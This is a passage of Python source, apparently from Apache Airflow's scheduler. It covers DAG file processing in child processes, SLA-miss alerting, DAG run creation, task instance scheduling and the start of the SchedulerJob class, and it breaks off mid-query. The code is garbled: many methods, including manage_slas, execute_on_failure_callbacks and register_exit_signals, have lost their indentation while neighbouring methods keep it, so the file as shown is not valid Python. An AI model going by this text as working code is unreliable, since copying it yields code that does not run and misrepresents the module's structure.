        self._done = False
        # When the process started.
        self._start_time: Optional[datetime.datetime] = None
        # This ID is used to uniquely name the process / thread that's launched
        # by this processor instance
        self._instance_id = DagFileProcessorProcess.class_creation_counter
        # Parent end of the pipe used to receive the processing result.
        self._parent_channel: Optional[MultiprocessingConnection] = None
        DagFileProcessorProcess.class_creation_counter += 1

    @property
    def file_path(self) -> str:
        """Path of the DAG file this processor works on."""
        return self._file_path

    @staticmethod
    def _run_file_processor(
        result_channel: MultiprocessingConnection,
        file_path: str,
        pickle_dags: bool,
        dag_ids: Optional[List[str]],
        thread_name: str,
        failure_callback_requests: List[FailureCallbackRequest]
    ) -> None:
        """
        Process the given file.

        :param result_channel: the connection to use for passing back the result
        :type result_channel: multiprocessing.Connection
        :param file_path: the file to process
        :type file_path: str
        :param pickle_dags: whether to pickle the DAGs found in the file and
            save them to the DB
        :type pickle_dags: bool
        :param dag_ids: if specified, only examine DAG ID's that are
            in this list
        :type dag_ids: list[str]
        :param thread_name: the name to use for the process that is launched
        :type thread_name: str
        :param failure_callback_requests: failure callback to execute
        :type failure_callback_requests: list[airflow.utils.dag_processing.FailureCallbackRequest]
        :return: the process that was launched
        :rtype: multiprocessing.Process
        """
        # This helper runs in the newly created process
        log: logging.Logger = logging.getLogger("airflow.processor")

        set_context(log, file_path)
        setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))

        try:
            # redirect stdout/stderr to log
            with ExitStack() as exit_stack:
                exit_stack.enter_context(redirect_stdout(StreamLogWriter(log, logging.INFO)))  # type: ignore
                exit_stack.enter_context(redirect_stderr(StreamLogWriter(log, logging.WARN)))  # type: ignore

                # Re-configure the ORM engine as there are issues with multiple processes
                settings.configure_orm()

                # Change the thread name to differentiate log lines. This is
                # really a separate process, but changing the name of the
                # process doesn't work, so changing the thread name instead.
                threading.current_thread().name = thread_name
                start_time = time.time()

                log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
                dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
                result: Tuple[List[dict], int] = dag_file_processor.process_file(
                    file_path=file_path,
                    pickle_dags=pickle_dags,
                    failure_callback_requests=failure_callback_requests,
                )
                result_channel.send(result)
                end_time = time.time()
                log.info(
                    "Processing %s took %.3f seconds", file_path, end_time - start_time
                )
        except Exception:  # pylint: disable=broad-except
            # Log exceptions through the logging framework.
            log.exception("Got an exception! Propagating...")
            raise
        finally:
            result_channel.close()
            # We re-initialized the ORM within this Process above so we need to
            # tear it down manually here
            settings.dispose_orm()

    def start(self) -> None:
        """
        Launch the process and start processing the DAG.
        """
        start_method = self._get_multiprocessing_start_method()
        context = multiprocessing.get_context(start_method)

        self._parent_channel, _child_channel = context.Pipe()
        process = context.Process(
            target=type(self)._run_file_processor,
            args=(
                _child_channel,
                self.file_path,
                self._pickle_dags,
                self._dag_ids,
                "DagFileProcessor{}".format(self._instance_id),
                self._failure_callback_requests
            ),
            name="DagFileProcessor{}-Process".format(self._instance_id)
        )
        self._process = process
        self._start_time = timezone.utcnow()
        process.start()

    def kill(self) -> None:
        """
        Kill the process launched to process the file, and ensure consistent state.
        """
        if self._process is None:
            raise AirflowException("Tried to kill before starting!")
        self._kill_process()

    def terminate(self, sigkill: bool = False) -> None:
        """
        Terminate (and then kill) the process launched to process the file.

        :param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
        :type sigkill: bool
        """
        if self._process is None or self._parent_channel is None:
            raise AirflowException("Tried to call terminate before starting!")

        self._process.terminate()
        # Arbitrarily wait 5s for the process to die
        with suppress(TimeoutError):
            self._process._popen.wait(5)  # type: ignore # pylint: disable=protected-access
        if sigkill:
            self._kill_process()
        self._parent_channel.close()

    def _kill_process(self) -> None:
        # SIGKILL the child if it is still running; raises if never started.
        if self._process is None:
            raise AirflowException("Tried to kill process before starting!")

        if self._process.is_alive() and self._process.pid:
            self.log.warning("Killing PID %s", self._process.pid)
            os.kill(self._process.pid, signal.SIGKILL)

    @property
    def pid(self) -> int:
        """
        :return: the PID of the process launched to process the given file
        :rtype: int
        """
        if self._process is None or self._process.pid is None:
            raise AirflowException("Tried to get PID before starting!")
        return self._process.pid

    @property
    def exit_code(self) -> Optional[int]:
        """
        After the process is finished, this can be called to get the return code

        :return: the exit code of the process
        :rtype: int
        """
        if self._process is None:
            raise AirflowException("Tried to get exit code before starting!")
        if not self._done:
            raise AirflowException("Tried to call retcode before process was finished!")
        return self._process.exitcode

    @property
    def done(self) -> bool:
        """
        Check if the process launched to process this file is done.

        :return: whether the process is finished running
        :rtype: bool
        """
        if self._process is None or self._parent_channel is None:
            raise AirflowException("Tried to see if it's done before starting!")

        if self._done:
            return True

        if self._parent_channel.poll():
            try:
                # a result arrived on the pipe: record it and reap the child
                self._result = self._parent_channel.recv()
                self._done = True
                self.log.debug("Waiting for %s", self._process)
                self._process.join()
                self._parent_channel.close()
                return True
            except EOFError:
                # Child closed its end of the pipe without sending a result;
                # fall through to the liveness check below.
                pass

        if not self._process.is_alive():
            # process exited without delivering a result
            self._done = True
            self.log.debug("Waiting for %s", self._process)
            self._process.join()
            self._parent_channel.close()
            return True

        return False

    @property
    def result(self) -> Optional[Tuple[List[dict], int]]:
        """
        :return: result of running SchedulerJob.process_file()
        :rtype: Optional[Tuple[List[dict], int]]
        """
        if not self.done:
            raise AirflowException("Tried to get the result before it's done!")
        return self._result

    @property
    def start_time(self) -> datetime.datetime:
        """
        :return: when this started to process the file
        :rtype: datetime
        """
        if self._start_time is None:
            raise AirflowException("Tried to get start time before it started!")
        return self._start_time

    @property
    def waitable_handle(self):
        # Sentinel usable with multiprocessing.connection.wait() to detect
        # child process exit.
        return self._process.sentinel
class DagFileProcessor(LoggingMixin):
    """
    Process a Python file containing Airflow DAGs.

    This includes:

    1. Execute the file and look for DAG objects in the namespace.
    2. Pickle the DAG and save it to the DB (if necessary).
    3. For each DAG, see what tasks should run and create appropriate task
       instances in the DB.
    4. Record any errors importing the file into ORM
    5. Kill (in ORM) any task instances belonging to the DAGs that haven't
       issued a heartbeat in a while.

    Returns a list of SimpleDag objects that represent the DAGs found in
    the file

    :param dag_ids: If specified, only look at these DAG ID's
    :type dag_ids: List[str]
    :param log: Logger to save the processing process
    :type log: logging.Logger
    """

    # Propagated to TaskInstance.test_mode when failure callbacks are executed
    # (see execute_on_failure_callbacks below).
    UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')

    def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
        super().__init__()
        # When not None, restricts processing to this subset of DAG IDs
        # (see _find_dags_to_process).
        self.dag_ids = dag_ids
        # Injected logger; presumably surfaced via LoggingMixin's ``log`` property.
        self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis: List[TI] = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas: List[SlaMiss] = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
    # pylint: disable=too-many-return-statements,too-many-branches
    @provide_session
    def create_dag_run(
        self,
        dag: DAG,
        dag_runs: Optional[List[DagRun]] = None,
        session: Session = None,
    ) -> Optional[DagRun]:
        """
        This method checks whether a new DagRun needs to be created
        for a DAG based on scheduling interval.

        Returns DagRun if one is scheduled. Otherwise returns None.

        :param dag: the DAG to possibly create a run for
        :param dag_runs: pre-fetched runs to use instead of querying the DB
        :param session: ORM session (injected by ``@provide_session``)
        """
        # pylint: disable=too-many-nested-blocks
        if not dag.schedule_interval:
            return None

        # Non-externally-triggered RUNNING runs count against max_active_runs.
        active_runs: List[DagRun]
        if dag_runs is None:
            active_runs = DagRun.find(
                dag_id=dag.dag_id,
                state=State.RUNNING,
                external_trigger=False,
                session=session
            )
        else:
            active_runs = [
                dag_run
                for dag_run in dag_runs
                if not dag_run.external_trigger
            ]
        # return if already reached maximum active runs and no timeout setting
        if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
            return None
        # Fail runs that exceeded dagrun_timeout; they free up active-run slots.
        timed_out_runs = 0
        for dr in active_runs:
            if (
                dr.start_date and dag.dagrun_timeout and
                dr.start_date < timezone.utcnow() - dag.dagrun_timeout
            ):
                dr.state = State.FAILED
                dr.end_date = timezone.utcnow()
                dag.handle_callback(dr, success=False, reason='dagrun_timeout',
                                    session=session)
                timed_out_runs += 1
        session.commit()
        if len(active_runs) - timed_out_runs >= dag.max_active_runs:
            return None

        # this query should be replaced by find dagrun
        last_scheduled_run: Optional[datetime.datetime] = (
            session.query(func.max(DagRun.execution_date))
            .filter_by(dag_id=dag.dag_id)
            .filter(or_(
                DagRun.external_trigger == False,  # noqa: E712 pylint: disable=singleton-comparison
                DagRun.run_type == DagRunType.SCHEDULED.value
            )).scalar()
        )

        # don't schedule @once again
        if dag.schedule_interval == '@once' and last_scheduled_run:
            return None

        # don't do scheduler catchup for dag's that don't have dag.catchup = True
        if not (dag.catchup or dag.schedule_interval == '@once'):
            # The logic is that we move start_date up until
            # one period before, so that timezone.utcnow() is AFTER
            # the period end, and the job can be created...
            now = timezone.utcnow()
            next_start = dag.following_schedule(now)
            last_start = dag.previous_schedule(now)
            if next_start <= now or isinstance(dag.schedule_interval, timedelta):
                new_start = last_start
            else:
                new_start = dag.previous_schedule(last_start)

            # NOTE: this mutates dag.start_date in place; only moves it forward
            # when one is already set.
            if dag.start_date:
                if new_start >= dag.start_date:
                    dag.start_date = new_start
            else:
                dag.start_date = new_start

        next_run_date = None
        if not last_scheduled_run:
            # First run: anchor the schedule on the earliest task start_date.
            task_start_dates = [t.start_date for t in dag.tasks]
            if task_start_dates:
                next_run_date = dag.normalize_schedule(min(task_start_dates))
                self.log.debug(
                    "Next run date based on tasks %s",
                    next_run_date
                )
        else:
            next_run_date = dag.following_schedule(last_scheduled_run)

        # make sure backfills are also considered
        last_run = dag.get_last_dagrun(session=session)
        if last_run and next_run_date:
            while next_run_date <= last_run.execution_date:
                next_run_date = dag.following_schedule(next_run_date)

        # don't ever schedule prior to the dag's start_date
        if dag.start_date:
            next_run_date = (dag.start_date if not next_run_date
                             else max(next_run_date, dag.start_date))
            if next_run_date == dag.start_date:
                next_run_date = dag.normalize_schedule(dag.start_date)

            self.log.debug(
                "Dag start date: %s. Next run date: %s",
                dag.start_date, next_run_date
            )

        # don't ever schedule in the future or if next_run_date is None
        if not next_run_date or next_run_date > timezone.utcnow():
            return None

        # this structure is necessary to avoid a TypeError from concatenating
        # NoneType
        period_end = None
        if dag.schedule_interval == '@once':
            period_end = next_run_date
        elif next_run_date:
            period_end = dag.following_schedule(next_run_date)

        # Don't schedule a dag beyond its end_date (as specified by the dag param)
        if next_run_date and dag.end_date and next_run_date > dag.end_date:
            return None

        # Don't schedule a dag beyond its end_date (as specified by the task params)
        # Get the min task end date, which may come from the dag.default_args
        min_task_end_date = min([t.end_date for t in dag.tasks if t.end_date], default=None)
        if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
            return None

        # Only create the run once its full schedule period has elapsed.
        if next_run_date and period_end and period_end <= timezone.utcnow():
            next_run = dag.create_dagrun(
                run_type=DagRunType.SCHEDULED,
                execution_date=next_run_date,
                start_date=timezone.utcnow(),
                state=State.RUNNING,
                external_trigger=False
            )
            return next_run

        return None
    @provide_session
    def _process_task_instances(
        self, dag: DAG, dag_runs: List[DagRun], session: Session = None
    ) -> List[TaskInstanceKey]:
        """
        This method schedules the tasks for a single DAG by looking at the
        active DAG runs and adding task instances that should run to the
        queue.

        :param dag: the DAG being examined
        :param dag_runs: the runs of that DAG to consider
        :return: keys of the task instances that are ready to be queued
        """
        # update the state of the previously active dag runs
        active_dag_runs = 0
        task_instances_list = []
        for run in dag_runs:
            self.log.info("Examining DAG run %s", run)
            # don't consider runs that are executed in the future unless
            # specified by config and schedule_interval is None
            if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
                self.log.error(
                    "Execution date is in future: %s",
                    run.execution_date
                )
                continue

            # Stop examining further runs once the active-run cap is hit.
            if active_dag_runs >= dag.max_active_runs:
                self.log.info("Number of active dag runs reached max_active_run.")
                break

            # skip backfill dagruns for now as long as they are not really scheduled
            if run.is_backfill:
                continue

            # todo: run.dag is transient but needs to be set
            run.dag = dag  # type: ignore
            # todo: preferably the integrity check happens at dag collection time
            run.verify_integrity(session=session)
            # update_state both refreshes the run's state and returns the TIs
            # whose dependencies are now satisfied.
            ready_tis = run.update_state(session=session)
            if run.state == State.RUNNING:
                active_dag_runs += 1
                self.log.debug("Examining active DAG run: %s", run)
                for ti in ready_tis:
                    self.log.debug('Queuing task: %s', ti)
                    task_instances_list.append(ti.key)
        return task_instances_list
    @provide_session
    def _process_dags(self, dags: List[DAG], session: Session = None) -> List[TaskInstanceKey]:
        """
        Iterates over the dags and processes them. Processing includes:

        1. Create appropriate DagRun(s) in the DB.
        2. Create appropriate TaskInstance(s) in the DB.
        3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).

        :param dags: the DAGs from the DagBag to process
        :type dags: List[airflow.models.DAG]
        :rtype: list[TaskInstance]
        :return: A list of generated TaskInstance objects
        """
        check_slas: bool = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
        use_job_schedule: bool = conf.getboolean('scheduler', 'USE_JOB_SCHEDULE')

        # pylint: disable=too-many-nested-blocks
        tis_out: List[TaskInstanceKey] = []
        dag_ids: List[str] = [dag.dag_id for dag in dags]
        # One query for all running runs of every DAG, then bucket them locally.
        dag_runs = DagRun.find(dag_id=dag_ids, state=State.RUNNING, session=session)
        # As per the docs of groupby (https://docs.python.org/3/library/itertools.html#itertools.groupby)
        # we need to use `list()` otherwise the result will be wrong/incomplete
        dag_runs_by_dag_id: Dict[str, List[DagRun]] = {
            k: list(v) for k, v in groupby(dag_runs, lambda d: d.dag_id)
        }
        for dag in dags:
            dag_id: str = dag.dag_id
            self.log.info("Processing %s", dag_id)
            dag_runs_for_dag = dag_runs_by_dag_id.get(dag_id) or []

            # Only creates DagRun for DAGs that are not subdag since
            # DagRun of subdags are created when SubDagOperator executes.
            if not dag.is_subdag and use_job_schedule:
                dag_run = self.create_dag_run(dag, dag_runs=dag_runs_for_dag)
                if dag_run:
                    dag_runs_for_dag.append(dag_run)
                    # Report how late the run started relative to its schedule.
                    expected_start_date = dag.following_schedule(dag_run.execution_date)
                    if expected_start_date:
                        schedule_delay = dag_run.start_date - expected_start_date
                        Stats.timing(
                            'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
                            schedule_delay)
                    self.log.info("Created %s", dag_run)

            if dag_runs_for_dag:
                tis_out.extend(self._process_task_instances(dag, dag_runs_for_dag))
                if check_slas:
                    self.manage_slas(dag)

        return tis_out
def _find_dags_to_process(self, dags: List[DAG]) -> List[DAG]:
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:return: DAGs to process
"""
if self.dag_ids:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids]
return dags
@provide_session
def execute_on_failure_callbacks(
self,
dagbag: DagBag,
failure_callback_requests: List[FailureCallbackRequest],
session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param failure_callback_requests: failure callbacks to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param session: DB session.
"""
for request in failure_callback_requests:
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
session.commit()
    @provide_session
    def process_file(
        self,
        file_path: str,
        failure_callback_requests: List[FailureCallbackRequest],
        pickle_dags: bool = False,
        session: Session = None
    ) -> Tuple[List[dict], int]:
        """
        Process a Python file containing Airflow DAGs.

        This includes:

        1. Execute the file and look for DAG objects in the namespace.
        2. Pickle the DAG and save it to the DB (if necessary).
        3. For each DAG, see what tasks should run and create appropriate task
           instances in the DB.
        4. Record any errors importing the file into ORM
        5. Kill (in ORM) any task instances belonging to the DAGs that haven't
           issued a heartbeat in a while.

        Returns a list of serialized_dag dicts that represent the DAGs found in
        the file

        :param file_path: the path to the Python file that should be executed
        :type file_path: str
        :param failure_callback_requests: failure callback to execute
        :type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
        :param pickle_dags: whether serialize the DAGs found in the file and
            save them to the db
        :type pickle_dags: bool
        :param session: Sqlalchemy ORM Session
        :type session: Session
        :return: a tuple with list of SimpleDags made from the Dags found in the file and
            count of import errors.
        :rtype: Tuple[List[dict], int]
        """
        self.log.info("Processing file %s for tasks to queue", file_path)

        try:
            dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
        except Exception:  # pylint: disable=broad-except
            # Parsing the file itself blew up; count the refresh error and bail.
            self.log.exception("Failed at reloading the DAG file %s", file_path)
            Stats.incr('dag_file_refresh_error', 1, 1)
            return [], 0

        if len(dagbag.dags) > 0:
            self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
        else:
            self.log.warning("No viable dags retrieved from %s", file_path)
            # Still surface the import errors so the UI can show them.
            self.update_import_errors(session, dagbag)
            return [], len(dagbag.import_errors)

        # Failure callbacks are best-effort: a broken callback must not stop scheduling.
        try:
            self.execute_on_failure_callbacks(dagbag, failure_callback_requests)
        except Exception:  # pylint: disable=broad-except
            self.log.exception("Error executing failure callback!")

        # Save individual DAGs in the ORM and update DagModel.last_scheduled_time
        dagbag.sync_to_db()

        paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)

        unpaused_dags: List[DAG] = [
            dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
        ]

        serialized_dags = self._prepare_serialized_dags(unpaused_dags, pickle_dags, session)

        dags = self._find_dags_to_process(unpaused_dags)

        ti_keys_to_schedule = self._process_dags(dags, session)

        self._schedule_task_instances(dagbag, ti_keys_to_schedule, session)

        # Record import errors into the ORM
        try:
            self.update_import_errors(session, dagbag)
        except Exception:  # pylint: disable=broad-except
            self.log.exception("Error logging import errors!")

        return serialized_dags, len(dagbag.import_errors)
    @provide_session
    def _schedule_task_instances(
        self,
        dagbag: DagBag,
        ti_keys_to_schedule: List[TaskInstanceKey],
        session: Session = None
    ) -> None:
        """
        Checks whether the tasks specified by `ti_keys_to_schedule` parameter can be
        scheduled and updates the information in the database.

        :param dagbag: DagBag
        :type dagbag: DagBag
        :param ti_keys_to_schedule: List of task instance keys which can be scheduled.
        :type ti_keys_to_schedule: list
        """
        # Refresh all task instances that will be scheduled
        filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
        refreshed_tis: List[TI] = []

        # Row-lock the candidate TIs so a concurrent scheduler cannot race us.
        if filter_for_tis is not None:
            refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()

        for ti in refreshed_tis:
            # Add task to task instance
            dag: DAG = dagbag.dags[ti.dag_id]
            ti.task = dag.get_task(ti.task_id)

            # We check only deps needed to set TI to SCHEDULED state here.
            # Deps needed to set TI to QUEUED state will be batch checked later
            # by the scheduler for better performance.
            dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)

            # Only schedule tasks that have their dependencies met, e.g. to avoid
            # a task that recently got its state changed to RUNNING from somewhere
            # other than the scheduler from getting its state overwritten.
            if ti.are_dependencies_met(
                dep_context=dep_context,
                session=session,
                verbose=True
            ):
                # Task starts out in the scheduled state. All tasks in the
                # scheduled state will be sent to the executor
                ti.state = State.SCHEDULED
                # If the task is dummy, then mark it as done automatically
                if isinstance(ti.task, DummyOperator) \
                        and not ti.task.on_execute_callback \
                        and not ti.task.on_success_callback:
                    ti.state = State.SUCCESS
                    ti.start_date = ti.end_date = timezone.utcnow()
                    ti.duration = 0

            # Also save this task instance to the DB.
            self.log.info("Creating / updating %s in ORM", ti)
            session.merge(ti)
        # commit batch
        session.commit()
@provide_session
def _prepare_serialized_dags(
self, dags: List[DAG], pickle_dags: bool, session: Session = None
) -> List[dict]:
"""
Convert DAGS to SimpleDags. If necessary, it also Pickle the DAGs
:param dags: List of DAGs
:return: List of SimpleDag
:rtype: List[dict]
"""
serialized_dags: List[dict] = []
# Pickle the DAGs (if necessary) and put them into a SimpleDagBag
for dag in dags:
if pickle_dags:
dag.pickle(session)
serialized_dags.append(SerializedDAG.to_dict(dag))
return serialized_dags
class SchedulerJob(BaseJob):  # pylint: disable=too-many-instance-attributes
    """
    This SchedulerJob runs for a specific time interval and schedules the jobs
    that are ready to run. It figures out the latest runs for each
    task and sees if the dependencies for the next schedules are met.
    If so, it creates appropriate TaskInstances and sends run commands to the
    executor. It does this for each task in each DAG and repeats.

    :param dag_id: if specified, only schedule tasks with this DAG ID
    :type dag_id: str
    :param dag_ids: if specified, only schedule tasks with these DAG IDs
    :type dag_ids: list[str]
    :param subdir: directory containing Python files with Airflow DAG
        definitions, or a specific path to a file
    :type subdir: str
    :param num_runs: The number of times to try to schedule each DAG file.
        -1 for unlimited times.
    :type num_runs: int
    :param processor_poll_interval: The number of seconds to wait between
        polls of running processors
    :type processor_poll_interval: int
    :param do_pickle: once a DAG object is obtained by executing the Python
        file, whether to serialize the DAG object to the DB
    :type do_pickle: bool
    """

    __mapper_args__ = {
        'polymorphic_identity': 'SchedulerJob'
    }
    heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')

    def __init__(
            self,
            dag_id: Optional[str] = None,
            dag_ids: Optional[List[str]] = None,
            subdir: str = settings.DAGS_FOLDER,
            num_runs: int = conf.getint('scheduler', 'num_runs'),
            processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
            do_pickle: bool = False,
            log: Any = None,
            *args, **kwargs):
        # for BaseJob compatibility
        self.dag_id = dag_id
        # dag_id and dag_ids are merged into a single filter list.
        self.dag_ids = [dag_id] if dag_id else []
        if dag_ids:
            self.dag_ids.extend(dag_ids)
        self.subdir = subdir
        self.num_runs = num_runs
        self._processor_poll_interval = processor_poll_interval
        self.do_pickle = do_pickle
        super().__init__(*args, **kwargs)
        if log:
            self._log = log
        # Check what SQL backend we use: sqlite/mysql need special row-locking
        # handling (see _change_state_for_tis_without_dagrun).
        sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
        self.using_sqlite = sql_conn.startswith('sqlite')
        self.using_mysql = sql_conn.startswith('mysql')
        self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
        # Created lazily when the job starts; None until then.
        self.processor_agent: Optional[DagFileProcessorAgent] = None
def register_exit_signals(self) -> None:
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
    @provide_session
    def _change_state_for_tis_without_dagrun(
        self,
        simple_dag_bag: SimpleDagBag,
        old_states: List[str],
        new_state: str,
        session: Session = None
    ) -> None:
        """
        For all DAG IDs in the SimpleDagBag, look for task instances in the
        old_states and set them to new_state if the corresponding DagRun
        does not exist or exists but is not in the running state. This
        normally should not happen, but it can if the state of DagRuns are
        changed manually.

        :param old_states: examine TaskInstances in this state
        :type old_states: list[airflow.utils.state.State]
        :param new_state: set TaskInstances to this state
        :type new_state: airflow.utils.state.State
        :param simple_dag_bag: TaskInstances associated with DAGs in the
            simple_dag_bag and with states in the old_states will be examined
        :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
        """
        tis_changed = 0
        # Outer join so TIs whose DagRun row is missing entirely are also caught.
        query = session \
            .query(models.TaskInstance) \
            .outerjoin(models.DagRun, and_(
                models.TaskInstance.dag_id == models.DagRun.dag_id,
                models.TaskInstance.execution_date == models.DagRun.execution_date)) \
            .filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
            .filter(models.TaskInstance.state.in_(old_states)) \
            .filter(or_(
                # pylint: disable=comparison-with-callable
                models.DagRun.state != State.RUNNING,
                models.DagRun.state.is_(None)))  # pylint: disable=no-member
        # We need to do this for mysql as well because it can cause deadlocks
        # as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
        if self.using_sqlite or self.using_mysql:
            # Per-row path: lock the rows and update them one by one.
            tis_to_change: List[TI] = query.with_for_update().all()
            for ti in tis_to_change:
                ti.set_state(new_state, session=session)
                tis_changed += 1
        else:
            # Bulk path for backends that support UPDATE ... FROM a subquery.
            subq = query.subquery()
            tis_changed = session \
                .query(models.TaskInstance) \
                .filter(
                    models.TaskInstance.dag_id == subq.c.dag_id,
